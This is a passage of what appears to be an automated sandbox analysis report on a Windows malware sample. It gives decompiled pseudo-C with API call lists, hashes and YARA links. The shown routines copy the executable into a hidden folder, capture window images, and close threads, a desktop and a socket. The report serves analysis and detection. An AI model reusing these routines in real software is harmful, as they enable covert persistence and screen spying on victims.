															if(_t433 != _t378 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t363 = _t363 + 0xc;
														__eflags = _t363 - 0xb34d94;
													} while (_t363 <= 0xb34d94);
													_t360 = _v472 + 2;
													_t266 = E00B5BDB5(_t377, _t360, 0xb34e24);
													_t430 = _v464;
													_t449 = _t266;
													_pop(_t381);
													__eflags = _t449;
													if(_t449 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t382 = _v452;
															goto L54;
														} else {
															_push(_t449);
															_t269 = E00B598A4( &_v276, 0x83, _t360);
															_t477 = _t474 + 0x10;
															__eflags = _t269;
															if(_t269 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00B52919();
																asm("int3");
																_push(_t465);
																_t467 = _t477;
																_t272 =  *0xb69014; // 0x7e8b4fb6
																_v560 = _t272 ^ _t467;
																_push(_t360);
																_t365 = _v544;
																_push(_t449);
																_push(_t430);
																_t434 = _v548;
																_v1288 = _t365;
																_v1276 = E00B5830D(_t381, _t421) + 0x278;
																_t279 = E00B53E03(_t365, _t434, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t479 = _t477 - 0x2e4 + 0x18;
																__eflags = _t279;
																if(_t279 == 0) {
																	L122:
																	__eflags = 0;
																	goto L123;
																} else {
																	_t102 = _t365 + 2; // 0x6
																	_t453 = _t102 << 4;
																	__eflags = _t453;
																	_t282 =  &_v280;
																	_v724 = _t453;
																	_t385 =  *((intOrPtr*)(_t453 + _t434));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t282 -  *_t385;
																		_t455 = _v724;
																		if( *_t282 !=  *_t385) {
																			break;
																		}
																		__eflags =  *_t282;
																		if( *_t282 == 0) {
																			L89:
																			_t283 = _v712;
																		} else {
																			_t461 =  *((intOrPtr*)(_t282 + 2));
																			__eflags = _t461 -  *((intOrPtr*)(_t385 + 2));
																			_v714 = _t461;
																			_t455 = _v724;
																			if(_t461 !=  *((intOrPtr*)(_t385 + 2))) {
																				break;
																			} else {
																				_t282 = _t282 + 4;
																				_t385 = _t385 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t283;
																		if(_t283 != 0) {
																			_t386 =  &_v280;
																			_t426 = _t386 + 2;
																			do {
																				_t284 =  *_t386;
																				_t386 = _t386 + 2;
																				__eflags = _t284 - _v712;
																			} while (_t284 != _v712);
																			_v728 = (_t386 - _t426 >> 1) + 1;
																			_t287 = E00B56F1C(4 + ((_t386 - _t426 >> 1) + 1) * 2);
																			_v740 = _t287;
																			__eflags = _t287;
																			if(_t287 == 0) {
																				goto L122;
																			} else {
																				_v736 =  *((intOrPtr*)(_t455 + _t434));
																				_v748 =  *(_t434 + 0xa0 + _t365 * 4);
																				_v752 =  *(_t434 + 8);
																				_v716 = _t287 + 4;
																				_t289 = E00B5604D(_t287 + 4, _v728,  &_v280);
																				_t481 = _t479 + 0xc;
																				__eflags = _t289;
																				if(_t289 != 0) {
																					_t290 = _v712;
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					E00B52919();
																					asm("int3");
																					_t292 =  *0xb6a53c; // 0x0
																					return _t292;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t434)) = _v716;
																					if(_v280 != 0x43) {
																						L100:
																						_t295 = E00B53B10(_t365, _t434,  &_v708);
																						_t395 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t395 = _v712;
																							_t295 = _t395;
																						}
																					}
																					 *(_t434 + 0xa0 + _t365 * 4) = _t295;
																					__eflags = _t365 - 2;
																					if(_t365 != 2) {
																						__eflags = _t365 - 1;
																						if(_t365 != 1) {
																							__eflags = _t365 - 5;
																							if(_t365 == 5) {
																								 *((intOrPtr*)(_t434 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t434 + 0x10)) = _v720;
																						}
																					} else {
																						_t459 = _v732;
																						_t427 = _t395;
																						_t405 = _t459;
																						 *(_t434 + 8) = _v720;
																						_v716 = _t459;
																						_v728 = _t459[8];
																						_v720 = _t459[9];
																						while(1) {
																							__eflags =  *(_t434 + 8) -  *_t405;
																							if( *(_t434 + 8) ==  *_t405) {
																								break;
																							}
																							_t460 = _v716;
																							_t427 = _t427 + 1;
																							_t327 =  *_t405;
																							 *_t460 = _v728;
																							_v720 = _t405[1];
																							_t405 = _t460 + 8;
																							 *((intOrPtr*)(_t460 + 4)) = _v720;
																							_t365 = _v744;
																							_t459 = _v732;
																							_v728 = _t327;
																							_v716 = _t405;
																							__eflags = _t427 - 5;
																							if(_t427 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t427 - 5;
																							if(__eflags == 0) {
																								_t318 = E00B5BFC9(_t365, _t434, _t459, __eflags, _v712, 1, 0xb34cd8, 0x7f,  &_v536,  *(_t434 + 8), 1);
																								_t481 = _t481 + 0x1c;
																								__eflags = _t318;
																								if(_t318 == 0) {
																									_t406 = _v712;
																								} else {
																									_t320 = _v712;
																									do {
																										 *(_t467 + _t320 * 2 - 0x20c) =  *(_t467 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t322 = L00B4E36D( &_v536,  *0xb690a0, 0xfe);
																									_t481 = _t481 + 0xc;
																									__eflags = _t322;
																									_t406 = 0 | _t322 == 0x00000000;
																								}
																								_t459[1] = _t406;
																								 *_t459 =  *(_t434 + 8);
																							}
																							 *(_t434 + 0x18) = _t459[1];
																							goto L120;
																						}
																						__eflags = _t427;
																						if(_t427 != 0) {
																							 *_t459 =  *(_t459 + _t427 * 8);
																							_t459[1] =  *(_t459 + 4 + _t427 * 8);
																							 *(_t459 + _t427 * 8) = _v728;
																							 *(_t459 + 4 + _t427 * 8) = _v720;
																						}
																						goto L108;
																					}
																					L120:
																					_t296 = _t365 * 0xc;
																					_t198 = _t296 + 0xb34d60; // 0xb469c7
																					 *0xb672b4(_t434);
																					_t298 =  *((intOrPtr*)( *_t198))();
																					_t398 = _v736;
																					__eflags = _t298;
																					if(_t298 == 0) {
																						__eflags = _t398 - 0xb693d8;
																						if(_t398 != 0xb693d8) {
																							_t458 = _t365 + _t365;
																							__eflags = _t458;
																							asm("lock xadd [eax], ecx");
																							if(_t458 != 0) {
																								goto L127;
																							} else {
																								E00B564B8( *((intOrPtr*)(_t434 + 0x28 + _t458 * 8)));
																								E00B564B8( *((intOrPtr*)(_t434 + 0x24 + _t458 * 8)));
																								E00B564B8( *(_t434 + 0xa0 + _t365 * 4));
																								_t401 = _v712;
																								 *(_v724 + _t434) = _t401;
																								 *(_t434 + 0xa0 + _t365 * 4) = _t401;
																							}
																						}
																						_t399 = _v740;
																						 *_t399 = 1;
																						 *((intOrPtr*)(_t434 + 0x28 + (_t365 + _t365) * 8)) = _t399;
																					} else {
																						 *((intOrPtr*)(_v724 + _t434)) = _t398;
																						E00B564B8( *(_t434 + 0xa0 + _t365 * 4));
																						 *(_t434 + 0xa0 + _t365 * 4) = _v748;
																						E00B564B8(_v740);
																						 *(_t434 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			L123:
																			__eflags = _v16 ^ _t467;
																			return E00B4AE43(_v16 ^ _t467);
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t283 = _t282 | 0x00000001;
																	__eflags = _t283;
																	goto L91;
																}
															} else {
																_t329 = _t449 + _t449;
																__eflags = _t329 - 0x106;
																if(_t329 >= 0x106) {
																	E00B4AF7A();
																	goto L82;
																} else {
																	 *((short*)(_t465 + _t329 - 0x10c)) = 0;
																	_t331 =  &_v276;
																	_push(_t331);
																	_push(_v456);
																	_push(_t430);
																	L83();
																	_t382 = _v452;
																	_t474 = _t477 + 0xc;
																	__eflags = _t331;
																	if(_t331 != 0) {
																		_t382 = _t382 + 1;
																		_v452 = _t382;
																	}
																	L54:
																	_t446 = _t360 + _t449 * 2;
																	_t267 =  *_t446 & 0x0000ffff;
																	_t421 = _t267;
																	__eflags = _t267;
																	if(_t267 != 0) {
																		_t446 = _t446 + 2;
																		__eflags = _t446;
																		_t421 =  *_t446 & 0x0000ffff;
																	}
																	__eflags = _t421;
																	if(_t421 != 0) {
																		continue;
																	} else {
																		__eflags = _t382;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t332 = 0x3b;
														__eflags =  *_t360 - _t332;
														if( *_t360 != _t332) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L131;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t446;
						if(_t446 != 0) {
							_push(_t446);
							_push(_t248);
							_push(_t430);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t465;
						return E00B4AE43(_v12 ^ _t465);
					}
				}
				L131:
			}

APIs

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

_free.LIBCMT ref: 00B543B6
_free.LIBCMT ref: 00B543CD
_free.LIBCMT ref: 00B543EC
_free.LIBCMT ref: 00B54407
_free.LIBCMT ref: 00B5441E

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 1ff368d11444aa5420c3e42bc9798bb2d61cc15932e3cfe127c7f131287a5de9
Instruction ID: 265088c333de908b61d4fc7b0f684e742498c32e536c4c4532f22811a8176b52
Opcode Fuzzy Hash: 1ff368d11444aa5420c3e42bc9798bb2d61cc15932e3cfe127c7f131287a5de9
Instruction Fuzzy Hash: 4A51C032A00604AFDB21DF29D881B6A77F4EF4872AF5445E9ED09DB260E731AE448B44

Uniqueness

Uniqueness Score: -1.00%

Function 00B491F4, Relevance: 7.6, APIs: 5, Instructions: 91
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B491F4(CHAR* __ecx, void* __eflags) {
				char _v8;
				CHAR* _v12;
				CHAR* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t11;
				CHAR* _t13;
				intOrPtr* _t15;
				void* _t17;
				void* _t19;
				int _t23;
				void* _t29;
				void* _t33;
				char _t36;
				char _t38;
				void* _t41;
				void* _t43;
				void* _t44;
				CHAR* _t46;
				void* _t47;
				CHAR* _t48;
				void* _t49;
				void* _t53;

				_t53 = __eflags;
				_v16 = __ecx;
				_push(0x104);
				_t11 = E00B509A2();
				_push(0x104);
				_v8 = _t11;
				_v12 = E00B509A2();
				_t13 = E00B4903F(0x104,  &_v8,  &_v12, _t44, _t47, _t49, _t53);
				_push(0x104);
				_t48 = _t13;
				_t33 = E00B509A2();
				_t15 = E00B4A582(_t53);
				_t41 = _t33 - _t15;
				do {
					_t36 =  *_t15;
					 *((char*)(_t41 + _t15)) = _t36;
					_t15 = _t15 + 1;
					_t55 = _t36;
				} while (_t36 != 0);
				_push(_t33);
				_push(_v8);
				_push(_t48);
				_t45 = E00B4301E(_t55);
				_t17 = E00B42D46(_t33, _t16, _t48);
				_t56 = _t17;
				if(_t17 != 0) {
					L9:
					__eflags = 0;
					return 0;
				}
				_t19 = E00B4A9CD(_t56, _t45);
				E00B42FDB(_t56, E00B42ECE(_t33, _t45, _t48, _t56), _t19);
				if(PathFileExistsA(_t48) == 1) {
					goto L9;
				}
				_t46 = _v12;
				_t23 = PathFileExistsA(_t46);
				_t58 = _t23 - 1;
				if(_t23 != 1) {
					CreateDirectoryA(_t46, 0);
					SetFileAttributesA(_t46, 6);
				}
				CopyFileA(_v16, _t48, 0);
				_push(_t48);
				E00B48BA1(_t33, _t46, _t48);
				E00B499C5(_t33, _t46, _t48, _t58, _t48, _t33);
				E00B49B90(_t33, _t48, _t48, _t33);
				E00B49CBF(_t33, _t46, _t48, _t58, _t46);
				_push(0x104);
				_t29 = E00B509A2();
				_t43 = _t29 - _t48;
				do {
					_t38 =  *_t48;
					 *((char*)(_t43 + _t48)) = _t38;
					_t48 =  &(_t48[1]);
				} while (_t38 != 0);
				return _t29;
			}

APIs

Part of subcall function 00B4903F: Sleep.KERNEL32(00000064,?,?,?,00000104,00000104), ref: 00B49066

PathFileExistsA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00B49271
PathFileExistsA.SHLWAPI(?), ref: 00B49280
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B4928E
SetFileAttributesA.KERNEL32(?,00000006), ref: 00B49297
CopyFileA.KERNEL32 ref: 00B492A3

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ExistsPath$AttributesCopyCreateDirectorySleep
String ID:
API String ID: 3090365614-0
Opcode ID: 5f76edfbe5864dcc2bf669beb7fc28c6ec11bbcc97b5e7fc00b8f88ff03333ed
Instruction ID: 87fae02b53992c172d314cb267955ef4e2e4681e620564c4cf2c3384d19d5440
Opcode Fuzzy Hash: 5f76edfbe5864dcc2bf669beb7fc28c6ec11bbcc97b5e7fc00b8f88ff03333ed
Instruction Fuzzy Hash: E221F5709042047BEB123BB85D8AAAF7AECDF42740F1004D4F541A3247DE748B05B7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B44383, Relevance: 7.6, APIs: 5, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B44383(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr* _a8) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t10;
				intOrPtr* _t34;
				struct HWND__* _t36;
				signed int _t37;

				_t10 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t10 ^ _t37;
				_t36 = _a4;
				_t34 = _a8;
				if(IsWindowVisible(_t36) != 0) {
					E00B442A8(__ebx, _t36,  *_t34, _t34, _t36, _t37,  *((intOrPtr*)(_t34 + 4)));
					SetWindowLongA(_t36, 0xfffffff0, GetWindowLongA(_t36, 0xfffffff0));
					E00B4D0F0(_t34,  &(_v156.dwMajorVersion), 0, 0x90);
					_v156.dwOSVersionInfoSize = 0x94;
					GetVersionExA( &_v156);
					if(_v156.dwMajorVersion < 6 && GetTopWindow(_t36) != 0) {
						E00B4435D(_t34, _t23);
					}
				}
				return E00B4AE43(_v8 ^ _t37);
			}

0x00b4438c
0x00b44393
0x00b44397
0x00b4439b
0x00b443a7
0x00b443b0
0x00b443c3
0x00b443d7
0x00b443df
0x00b443f0
0x00b443fd
0x00b4440e
0x00b4440e
0x00b443fd
0x00b44423

APIs

IsWindowVisible.USER32 ref: 00B4439F

Part of subcall function 00B442A8: GetWindowRect.USER32 ref: 00B442CE
Part of subcall function 00B442A8: CreateCompatibleDC.GDI32 ref: 00B442D5
Part of subcall function 00B442A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B442F0
Part of subcall function 00B442A8: SelectObject.GDI32(00000000,00000000), ref: 00B442FA
Part of subcall function 00B442A8: PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00B443B5,?), ref: 00B44303
Part of subcall function 00B442A8: BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00B44333
Part of subcall function 00B442A8: DeleteObject.GDI32(00000000), ref: 00B4433B
Part of subcall function 00B442A8: DeleteDC.GDI32(00000000), ref: 00B44342

GetWindowLongA.USER32 ref: 00B443B9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00B443C3
GetVersionExA.KERNEL32(00000094), ref: 00B443F0
GetTopWindow.USER32 ref: 00B44400

Part of subcall function 00B4435D: GetWindow.USER32(00000000,00000001), ref: 00B44374

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteLongObject$BitmapPrintRectSelectVersionVisible
String ID:
API String ID: 567582119-0
Opcode ID: efaa1f65b7e98d824463ec5ceab4dcb05c586af460e759dec87187c826efbba2
Instruction ID: e9f508f20b6ce60c71724e4c930c25f2f9b69786306b8129f59408204bcc5081
Opcode Fuzzy Hash: efaa1f65b7e98d824463ec5ceab4dcb05c586af460e759dec87187c826efbba2
Instruction Fuzzy Hash: 6811A131644114ABDB10AF70DC0AFAE73E8AF4A314F1041A4F515E72D1DF78AB069BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B462A9, Relevance: 7.5, APIs: 5, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B462A9() {
				int _t4;

				TerminateThread( *0xb6ae34, 0);
				TerminateThread( *0xb6ae30, 0);
				CloseDesktop( *0xb6ae3c);
				_t4 = CloseHandle( *0xb6ae34);
				 *0xb6ae74 = 0;
				 *0xb6ae88 = 0;
				 *0xb6ae80 = 0;
				 *0xb6ae8c = 0;
				__imp__#3( *0xb6ae40);
				 *0xb6ae3c = 0;
				 *0xb6ae40 = 0;
				return _t4;
			}

0x00b462b3
0x00b462c0
0x00b462cc
0x00b462d8
0x00b462e4
0x00b462ea
0x00b462f0
0x00b462f6
0x00b462fc
0x00b46302
0x00b46308
0x00b4630f

APIs

TerminateThread.KERNEL32(00000000,00000000,00B46157), ref: 00B462B3
TerminateThread.KERNEL32(00000000), ref: 00B462C0
CloseDesktop.USER32 ref: 00B462CC
CloseHandle.KERNEL32 ref: 00B462D8
closesocket.WS2_32 ref: 00B462FC

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseTerminateThread$DesktopHandleclosesocket
String ID:
API String ID: 2795373509-0
Opcode ID: 8678b6c7e5f2a640474e40dcf1eed9ef35a343043ffea431206172c91ccdce33
Instruction ID: 35bb80e3040f776a715460066df63782ee0194cb42af489eb6dc13ec2ab240c9
Opcode Fuzzy Hash: 8678b6c7e5f2a640474e40dcf1eed9ef35a343043ffea431206172c91ccdce33
Instruction Fuzzy Hash: E1F019765592009BCB126F56FD09805BFBAFBE6706320412AE501A32B0CFFF9851EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00B599F3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B599F3(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E00B533DE(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00B63587(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E00B52919();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E00B598AF(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E00B63587(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E00B59F2C(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00B564B8(_t302);
														_t305 = _v12;
													}
													E00B564B8(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E00B63587(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00B52919();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0xb69014; // 0x7e8b4fb6
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E00B635E0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E00B55F7B(_t245 - _t289 + 1, _t289,  &_v676, E00B56E67(__eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E00B59924( &(_v608.cFileName),  &_v640,  &_v609, E00B56E67(__eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E00B564B8(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
